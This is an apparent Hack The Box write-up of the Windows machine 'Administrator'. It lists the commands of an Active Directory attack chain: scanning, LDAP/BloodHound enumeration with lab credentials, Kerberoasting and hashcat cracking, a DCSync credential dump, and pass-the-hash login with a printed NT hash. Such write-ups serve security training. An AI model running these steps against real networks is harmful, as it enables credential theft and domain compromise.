AdministratorMarch 02, 2025 Created by Page Difficulty OS nirza Hack The Box Medium Windows I start with a scan of the open ports and I continue with a scan of the versions and technologies that are running on the open ports that we have found nmap -p- --open --min-rate 5000 -Pn sS 10.10.11.42 -oG scan nmap -p21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49667,49668,52151,56764,60584,60595,60600,60603,60623 -sCV -Pn 10.10.11.42 -oN ports I’m trying to pull up something interesting that is shared by smb using the credentials provided by HTB but I can’t find anything. enumerate the system with ldapdomaindump bloodhound to see if there are potential ways to escalate privileges. ldapdomaindump -u 'ADMINISTRATOR.HTB\olivia' -p 'ichliebedich' 10.10.11.42 bloodhound-python -u 'olivia' -p 'ichliebedich' -ns 10.10.11.42 -d administrator.htb --zip I list the users who have SPN set to request a TGS, I find the user ethan and get his hash rdate -n 10.10.11.42; impacket-GetUserSPNs administrator.htb/olivia:ichliebedich -request I break in hash and get the clear text password from the user hashcat -m 13100 -a 0 TgS_ethan /usr/share/wordlists/rockyou.txt -o cracked.txt Consulting bloodhound I see that I can obtain the user hashes by doing a DCSync attack. impacket-secretsdump administrator.htb/ethan@10.10.11.42 I get the nt hash from the admin user and connect with it to the system to be able to read the second flag. evil-winrm -u Administrator -H "3dc553ce4b9fd20bd016e098d2d2fd2e" -i 10.10.11.42